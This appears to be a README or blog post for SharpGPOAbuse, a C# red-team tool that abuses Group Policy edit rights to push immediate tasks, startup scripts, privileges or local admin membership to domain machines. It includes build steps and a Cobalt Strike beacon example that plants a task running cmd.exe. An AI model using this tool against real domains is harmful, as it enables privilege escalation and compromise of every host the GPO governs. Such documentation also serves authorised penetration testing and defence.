SharpGPOAbuse

Overview

SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.

GPO abuses have been covered previously by @harmj0y and @_wald0 in the following blog posts which we highly recommend reading:

PowerView also supports the addition of a new immediate task that will execute when the GPO is pulled by the client machines. However, there were times when it was not possible to successfully use PowerView's New-GPOImmediateTask function. After digging a bit more into how we can edit the GPO manually we also came across the following blog post from @_RastaMouse:

Essentially, it is possible to modify a GPO by creating or modifying files in SYSVOL. The configuration for each GPO is saved in the following location:

\\<domain>\SYSVOL\<domain>\Policies\<GPO Unique ID>\

However, there are a few caveats. In order to successfully update the GPO manually by editing the files in SYSVOL we also need to update the following:

  • The value of the gPCMachineExtensionNames attribute of the GPO object (if we are editing the Computer policy).
  • The value of the versionNumber attribute of the GPO object.
  • The value of the version within the GPT.ini file in SYSVOL.

The version in GPT.ini and the versionNumber attribute of the GPO object must have the same value and must also be increased after performing any changes in order to enable client machines to pull any changes during their normal group policy update cycle.

In addition, the gPCMachineExtensionNames must have the GUID that corresponds to the settings we have modified. A list of GUIDs can be found here:

For example, in order to add a new startup script, the following GUIDs must be added in the value of gPCMachineExtensionNames attribute of the GPO object:

[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}{40B6664F-4972-11D1-A7CA-0000F87571E3}]

SharpGPOAbuse will take care of all of the above and can be used to perform the following actions:

  • Add rights to a user such as SeDebugPrivilegeSeTakeOwnershipPrivilege, etc.
  • Add a new startup script.
  • Add a new immediate task.
  • Add a user to the local admins group.

Code

SharpGPOAbuse has been built against .NET 3.5 and is compatible with Visual Studio 2017. The code is located at: 

CommandLineParser has been used in order to parse the command line arguments. This package will need to be installed by issuing the following command into the NuGet Package Manager Console:

Install-Package CommandLineParser -Version 1.9.3.15

After compiling the project, merge the SharpGPOAbuse.exe and the CommandLine.dll into one executable file using ILMerge:

ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.dll

Example

beacon> execute-assembly SharpGPOAbuse.exe --AddImmediateTask --TaskName "New Task" --Author DOMAIN\Administrator --Command "cmd.exe" --Arguments "/c whoami > C:\task.txt" --GPOName "Vulnerable GPO"
[*] Tasked beacon to run .NET program: SharpGPOAbuse.exe --AddImmediateTask --TaskName "New Task" --Author DOMAIN\Administrator --Command "cmd.exe" --Arguments "/c whoami > C:\task.txt" --GPOName "Vulnerable GPO"
[+] host called home, sent: 171873 bytes
[+] received output:
[+] Domain = domain.com
[+] Domain Controller = EURODC01.domain.com
[+] Distinguished Name = CN=Policies,CN=System,DC=domain,DC=com
[+] GUID of "Vulnerable GPO" is: {B015712C-9646-4269-9411-85E5A78102F4}
[+] Creating file \\domain.com\SysVol\domain.com\Policies\{B015712C-9646-4269-9411-85E5A78102F4}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!

Future

SharpGPOAbuse can be extended to support more functionality for abusing GPOs. Examples of such functionality include:

  • Open ports on host-based firewalls.
  • Add a malicious service.
  • Modify registry key values.

Credits

This tool was originally developed by Petros Koutroumpis (@pkb1s).